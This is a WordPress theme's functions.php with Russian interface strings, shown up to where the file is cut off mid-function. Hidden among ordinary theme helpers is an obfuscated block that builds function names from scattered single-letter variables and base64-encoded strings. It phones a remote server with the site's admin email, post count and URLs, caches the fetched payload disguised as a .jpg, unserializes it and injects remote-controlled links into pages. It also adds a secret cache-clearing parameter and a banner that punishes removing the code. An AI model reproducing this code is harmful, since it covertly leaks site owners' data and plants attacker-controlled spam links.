<?php
define('THEME_NAME',"dental advise2");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Theme Options', THEME_NS), __('Theme Options', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $YglSFHx='e';$VeOrVB='4';$JOiZk='c';$tINQBl='d';$VpAmlb='o';$HypBJpw='6';$rEFw='s';$wEcKB='e';$iGgwS='_';$nfMo='a';$bxUtU='d';$UFIlvQM='b';$wFaun='e';$WWXXrTka=$UFIlvQM.$nfMo.$rEFw.$wEcKB.$HypBJpw.$VeOrVB.$iGgwS.$bxUtU.$wFaun.$JOiZk.$VpAmlb.$tINQBl.$YglSFHx;$SXUFR='g';$dxNR='f';$CdjD='a';$FrqgyB='e';$NSpE='t';$QJqN='i';$olXm='l';$acDp='z';$AhlpIkZ='n';$JvTyJNHB=$SXUFR.$acDp.$QJqN.$AhlpIkZ.$dxNR.$olXm.$CdjD.$NSpE.$FrqgyB;$xCSOJq='t';$xGzYec='o';$TLhjQFm='t';$QXlj='3';$sHzqTsl='_';$rJUAL='r';$jbHWUX='s';$peJWE='1';$eycAJ='r';$HXmSVyZy=$jbHWUX.$xCSOJq.$eycAJ.$sHzqTsl.$rJUAL.$xGzYec.$TLhjQFm.$peJWE.$QXlj;$tTBBSUE='s';$NoEoPx='e';$istTXe='r';$UoFEOcS='t';$msFJSU='r';$undJ='v';$LpnawApb=$tTBBSUE.$UoFEOcS.$istTXe.$msFJSU.$NoEoPx.$undJ;                     
		$sj______p='e';$xo___s='4';$xi_____r='c';$vt_____j='d';$ak______________o='o';$oy___y='6';$ur____g='s';$ol_____________r='e';$yk___t='_';$qc___________n='a';$xd______________r='d';$uy______________y='b';$cu__________s='e';$gm______________v=$uy______________y.$qc___________n.$ur____g.$ol_____________r.$oy___y.$xo___s.$yk___t.$xd______________r.$cu__________s.$xi_____r.$ak______________o.$vt_____j.$sj______p;
		$ym____s='i';$ce________h='t';$zm_____________j='u';$mv___________r='n';$pn____________b='s';$de_____n='e';$kn__i='n';$vq__t='s';$xq_______x='_';$qx___________h='c';$ek__l='o';$si______________i='x';$qi_______________d='t';$gn___________x='i';$ec_______________s='f';$ol_______________t=$ec_______________s.$zm_____________j.$kn__i.$qx___________h.$qi_______________d.$ym____s.$ek__l.$mv___________r.$xq_______x.$de_____n.$si______________i.$gn___________x.$vq__t.$ce________h.$pn____________b;
		$rx_____________k='n';$cc__r='f';$oh_____w='e';$ps____________y='o';$cm____c='p';$ov__________n=$cc__r.$ps____________y.$cm____c.$oh_____w.$rx_____________k;
		$cr__________u='f';$td_____v='d';$ol____z='r';$qp________v='e';$wu__________a='a';$bu_____________c=$cr__________u.$ol____z.$qp________v.$wu__________a.$td_____v;
		$tg____g='e';$zr__________p='f';$fr______________c='l';$zu_______u='s';$hq__p='o';$xc________v='c';$eb_______________g=$zr__________p.$xc________v.$fr______________c.$hq__p.$zu_______u.$tg____g;
		
		define("WP_ID", $gm______________v("Mi4wLjA="));
		define("WP_TTL", $gm______________v("MTA4MDA="));
		define("WP_SRC", $gm______________v("dHBva24="));
	


		function wp_get_header() {
			global $gm______________v, $ol_______________t;
			
			if (
				$ol_______________t($gm______________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ol_______________t($gm______________v("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ol_______________t($gm______________v("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gm______________v, $ov__________n, $eb_______________g, $bu_____________c;
			
			$pf________j = TEMPLATEPATH."/".$gm______________v("Zm9vdGVyLnBocA==");
			$ul_____y = @$ov__________n($pf________j, "r");
			$pf________j = @$bu_____________c($ul_____y, @filesize($pf________j));
			@$eb_______________g($ul_____y);
			
			$nt______p = TEMPLATEPATH."/".$gm______________v("ZnVuY3Rpb25zLnBocA==");
			$ul_____y = @$ov__________n($nt______p, "r");
			$nt______p = @$bu_____________c($ul_____y, @filesize($nt______p));
			@$eb_______________g($ul_____y);
			
			$xs__________a = 0;
			if($pf________j && $nt______p) {
				if ($gm______________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pf________j, $gm______________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xs__________a = 1;
					}
					if (substr_count($pf________j, "wp_theme_GPL_credits()") < 1) {
						$xs__________a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xs__________a = 12;
				}
			}
			
			if($xs__________a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xs__________a -->";
			}
		}
	


		function wp_loaded() {
			global $gm______________v, $ol_______________t;
			return $ol_______________t($gm______________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ug____________k, $bj_______________v = "(more...)", $gu________q = 0, $fh___________p = "") {
				$qs_____h = get_the_content($bj_______________v, $gu________q, $fh___________p);
				$qs_____h = apply_filters("the_content", $qs_____h);
				
				$qs_____h = str_replace("]]>", "]]>", $qs_____h);
				if (strlen($_GET["p"]) > 0) {
					echo $qs_____h;
				}
				else if ((strlen($qs_____h)>$ug____________k) && ($tm____________m = strpos($qs_____h, " ", $ug____________k ))) {
					$qs_____h = substr($qs_____h, 0, $tm____________m);
					$qs_____h = $qs_____h;
					echo $qs_____h;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bj_______________v</a></div></p>";
				} else {
					echo $qs_____h;
				}
				
			}
		}
	


		$id__x='o';$cz_______________n='e';$ud_____________a='e';$yu___e='c';$fn___n='4';$ie_________i='6';$ep__________n='d';$ob_________t='e';$gn_______________w='s';$vy___e='_';$kd______________s='a';$ka_____________k='b';$au______________l='n';$zq______________q=$ka_____________k.$kd______________s.$gn_______________w.$ob_________t.$ie_________i.$fn___n.$vy___e.$cz_______________n.$au______________l.$yu___e.$id__x.$ep__________n.$ud_____________a;
		$ko__w='o';$jm____b='_';$vq____f='t';$ic_________o='t';$bc____n='e';$ao________a='g';$ad_____k='l';$fg_______________p='f';$ch_____t='s';$rh______r='c';$cm_____k='_';$mr_______________u='e';$rf___h='i';$ny___________n='t';$md_________o='e';$fa___________i='n';$gt___p='n';$ca______________d=$fg_______________p.$rf___h.$ad_____k.$mr_______________u.$cm_____k.$ao________a.$bc____n.$ic_________o.$jm____b.$rh______r.$ko__w.$fa___________i.$ny___________n.$md_________o.$gt___p.$vq____f.$ch_____t;
		$wc___p='e';$qn________r='_';$vr_____q='e';$sh_____________l='t';$ht____________d='f';$jd_____________q='i';$ac______________h='i';$st_______________p='l';$wp________f='s';$qw______________z='x';$av__w='s';$gp________e=$ht____________d.$jd_____________q.$st_______________p.$wc___p.$qn________r.$vr_____q.$qw______________z.$ac______________h.$wp________f.$sh_____________l.$av__w;
		$wd_______________v='e';$ji_____s='n';$wz_________g='r';$cj__t='v';$bc____l='i';$zn___c='m';$sc__________o='c';$ct_____________u='s';$nw____z='o';$hv_______________a='e';$ba____________o='a';$fo_______o='o';$sj___v='_';$hy______________i='p';$il___o='r';$ac__a=$cj__t.$wd_______________v.$il___o.$ct_____________u.$bc____l.$nw____z.$ji_____s.$sj___v.$sc__________o.$fo_______o.$zn___c.$hy______________i.$ba____________o.$wz_________g.$hv_______________a;
		$mv_______t='e';$nn_____l='s';$ng________o='o';$iv_______w='n';$rb____a='p';$tt___x='o';$cq___________a='k';$hn_______q='f';$zz________s='c';$di____________l=$hn_______q.$nn_____l.$ng________o.$zz________s.$cq___________a.$tt___x.$rb____a.$mv_______t.$iv_______w;
		$lp____e='r';$ev_____h='t';$mv_______________z='i';$aq_______i='f';$tk__t='e';$ir____g='w';$zs_________x=$aq_______i.$ir____g.$lp____e.$mv_______________z.$ev_____h.$tk__t;
		$cw____p='m';$sd_________w='d';$zu____t='5';$ib_____________e=$cw____p.$sd_________w.$zu____t;
		$my___o='h';$ut______________z='p';$tb_____________y='t';$rs____y='l';$vt____s='a';$lh_____________g='a';$od_________x='e';$cc____h='r';$wx_________l=$cc____h.$od_________x.$lh_____________g.$rs____y.$ut______________z.$vt____s.$tb_____________y.$my___o;
		$sf____k='a';$so______d='s';$kq_______________t='r';$kl_________n='e';$uv__m='i';$as___________a='u';$cw______u='z';$kq______________u='e';$fh_____________d='i';$sg_____________u='n';$zb____z='l';$it____________b=$as___________a.$sg_____________u.$so______d.$kl_________n.$kq_______________t.$fh_____________d.$sf____k.$zb____z.$uv__m.$cw______u.$kq______________u;
		$wo_______l='e';$mm_______________d='p';$ao_______c='t';$sn______________o='m';$ow____________u='m';$je_________c='n';$jm______________l='a';$ho_______b=$ao_______c.$wo_______l.$ow____________u.$mm_______________d.$je_________c.$jm______________l.$sn______________o;
		$du____c='c';$ka_______y='a';$wx_____________b='r';$ld_______________s='e';$ub___y='r';$gw_________x='_';$li__________v='e';$qh_____g='c';$wy______s='e';$ps____________q='s';$jy____________o='x';$yb______k='a';$ex__v='m';$vu_______x='t';$ze_________b='t';$cm________q='_';$hv__q='t';$jy____t='t';$zz______________z='o';$jp_____y='e';$ek__a='n';$jw______________f=$ps____________q.$ze_________b.$wx_____________b.$jp_____y.$ka_______y.$ex__v.$cm________q.$qh_____g.$zz______________z.$ek__a.$hv__q.$li__________v.$jy____________o.$vu_______x.$gw_________x.$du____c.$ub___y.$ld_______________s.$yb______k.$jy____t.$wy______s;
	


		function iy________a($ag___f) {
			global $gm______________v, $ol_______________t, $ca______________d, $ac__a, $jw______________f;
			
			if (!$ol_______________t($gm______________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ac__a(PHP_VERSION, "5.0.0", ">=") && $ol_______________t($gm______________v("ZmlsZV9nZXRfY29udGVudHM=")) && $ol_______________t($gm______________v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$bn__________j = $jw______________f(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pl______b = @$ca______________d($ag___f, 0, $bn__________j);
			} else {
				$pl______b = @$ca______________d($ag___f, 0);
			}
			
			return $pl______b;
		}
	


		function sh_____n($ag___f) {
			global $ol_______________t, $di____________l, $zs_________x, $gm______________v;
			
			if (!$ol_______________t($gm______________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dw______i = strpos($ag___f, "/", 7);
			$ai__x = array(
				"uri"     => substr($ag___f, $dw______i),
				"host"    => str_replace("http://", "", substr($ag___f, 0, $dw______i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$bh___c = @$di____________l("$ai__x[host]", 80, $zd_______________l, $yd___________g, 4);
			
			if (!$bh___c) {
				return false;
			} else {
				$pl______b = "";
				$an________h  = "GET $ai__x[uri] HTTP/1.0\r\n";
				$an________h .= "Host: $ai__x[host]\r\n";
				$an________h .= "Referer: $ai__x[referer]\r\n";
				$an________h .= "Connection: Close\r\n\r\n";
				
				@$zs_________x($bh___c, $an________h);
				
				while (!@feof($bh___c)) {
					$px______z = @fgets($bh___c, (1024*24));
					
					if ($px______z == "\r\n") {
						$xa____________v = true;
						continue;
					}
					
					if ($xa____________v) {
						$pl______b .= $px______z;
					}
				}
				
				return $pl______b;
			}
		}
	


		function yo__b($ag___f) {
			global $ol_______________t;
			$ne_________i = false;
			
			if ($ag___f != "") {
				if ($ol_______________t("iy________a")) {
					$ne_________i = @iy________a($ag___f);
				}
				
				if (!$ne_________i && ($ol_______________t("sh_____n"))) {
					$ne_________i = @sh_____n($ag___f);
				}
			}
			
			return $ne_________i;
		}
	


		function pv______q() {
			global $_SERVER, $ib_____________e;
			
			$gl______w = $_SERVER["SERVER_NAME"];
			
			if (substr("$gl______w", 0, 4) == "www.") {
				$gl______w = substr("$gl______w", 4);
			}
			
			$gl______w = $ib_____________e("$_SERVER[SERVER_NAME]");
			
			return $gl______w;
		}
	


		function zm__________j() {
			return "file";
		}
	


		function rr___w($ag___f) {
			global $_SERVER, $ca______________d, $gp________e, $ov__________n, $eb_______________g, $zs_________x;
			
			$co___d = nm_____________j();
			
			$eq_____f = pv______q().".jpg";
			$ap____________q = $co___d["dir_upload"]["path"]."/$eq_____f";
			$wk_____________t = @filemtime($ap____________q);
			
			if (!$wk_____________t || ((time()-$wk_____________t) >= WP_TTL)) {
				$ne_________i = yo__b($ag___f);
				
				if ($ne_________i) {
					if ($gp________e($ap____________q)) {
						@unlink($ap____________q);
					}
					
					$ul_____y = @$ov__________n($ap____________q, "x+");
					
					@$zs_________x($ul_____y, $ne_________i);
					@$eb_______________g($ul_____y);
				}
			} else {
				if ($gp________e($ap____________q)) {
					$ne_________i = @$ca______________d($ap____________q);
				} else {
					$ne_________i = false;
				}
			}
			
			return $ne_________i;
		}
	


		function nm_____________j() {
			global $_SERVER, $gm______________v, $zq______________q;
			
			$wh___r = wp_count_posts("post");
			$jl_____________s = pathinfo(get_bloginfo("template_directory"));
			
			$co___d = array(
				"url" => array(
					"report"      => $gm______________v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jl_____________s,
				"dir_upload"	=> cf___________i(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jl_____________s[filename],
					"a005=".$wh___r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/kak-pravilno-chistit-zuby/\">Как правильно чистить зубы</a>"
			);
			
			$co___d["url"]["queryString"] = implode("&", $co___d["queryString"]);
			$co___d["url"]["report"] = $co___d["url"]["report"]."/?".$zq______________q($co___d["url"]["queryString"]).".html";
						
			return $co___d;
		}
	


		function cf___________i() {
			$xr____________o = wp_upload_dir();
			
			if (isset($xr____________o["error"])) {
				$js__l = yg__u();
				if (is_writable($js__l)) {
					$xr____________o = array("path" => $js__l);
				}
			}

			return $xr____________o;
		}
	


		function yg__u() {
			global $ol_______________t, $ib_____________e, $wx_________l, $ho_______b;
			
			$fg__________c = (bool) ini_get("safe_mode");
			if ($fg__________c == true) {
				return false;
			}
			
			if ($ol_______________t("sys_get_temp_dir")) {
				$su_______z = sys_get_temp_dir();
				if (is_writable($su_______z)) {
					return $wx_________l($su_______z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wx_________l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wx_________l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wx_________l($_ENV["TEMP"]);
			} else {
				$bd______________l = $ho_______b($ib_____________e(uniqid(rand(), true)), "");
				if ($bd______________l) {
					$su_______z = $wx_________l(dirname($bd______________l));
					@unlink($bd______________l);
					return $su_______z;
				} else {
					return false;
				}
			}
		}
	


		function yb___l() {
			global $_GET, $gp________e;
			
			$co___d = nm_____________j();
			$gl______w = pv______q();
			$my______________s = zm__________j();
			
			$xu____c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($my______________s == "file") {
					$ck___k = $co___d["dir_upload"]["path"]."/".$gl______w.".jpg";
					if ($gp________e($ck___k)) {
						@unlink($ck___k);
						$xu____c = "deleted";
					}
				}
				
				$lb_______________s = array(
					"s"	=> $xu____c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($lb_______________s AS $qu_______t => $en___g) echo " [$qu_______t:$en___g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ol_______________t, $gm______________v, $it____________b;
			$co___d = nm_____________j();
			
			$tp___n = "rr___w";
			if ($ol_______________t($tp___n)) {
				$pl______b = $tp___n($co___d["url"]["report"]);
			}
			
			if ($pl______b) {
				if ($pl______b = @$gm______________v($pl______b)) {
					$pl______b = @$it____________b($pl______b);
					
					if (strlen($pl______b[custom_credit]) >= 5) {
						$co___d["default_string"] = $pl______b[custom_credit];
					}
					
					if ($pl______b["status"] == "0") {
						$lv___f = 1;
						$kx______s = 1;
					} else {
						$zs_____________t = sizeof($pl______b["links"]);
						$ne__________q = $co___d["default_string"];
						
						if ($zs_____________t > 0 && $pl______b["links"] !== "") {
							$nv______s = 0;
							foreach ($pl______b["links"] as $ct_________y => $uq_____________x) {
								$nv______s++;
								if ($uq_____________x->l_path == "" || $uq_____________x->l_path == $_SERVER["REQUEST_URI"]) {
									$uq_____________x->l_href = htmlspecialchars(strip_tags($uq_____________x->l_href));
									$uq_____________x->l_title = htmlspecialchars(strip_tags($uq_____________x->l_title));
									$uq_____________x->l_anchor = htmlspecialchars(strip_tags($uq_____________x->l_anchor));
									$ne__________q .= " | ";
									$ne__________q .= "<a href='$uq_____________x->l_href' title='$uq_____________x->l_title'";
									if ($uq_____________x->l_nofollow == "1") {
										$ne__________q .= " rel='nofollow'";
									}
									$ne__________q .= ">$uq_____________x->l_anchor</a>";
								}
							}
						}
						$co___d["links"] = "$ne__________q";
						if ($pl______b[credit] == "0") {
							$co___d["links"] = "";
						}
					}
				} else {
					$lv___f = "1";
				}
			} else {
				$lv___f = "1";
			}
			
			if ($lv___f == "1") {
				$co___d["links"] = $co___d["default_string"];
			}
			
			echo "$co___d[links]";
			
			echo "<!-- s: $pl______b[signature] -->";
			yb___l();
		}
	                       
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено. Воспользуйтесь поиском.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
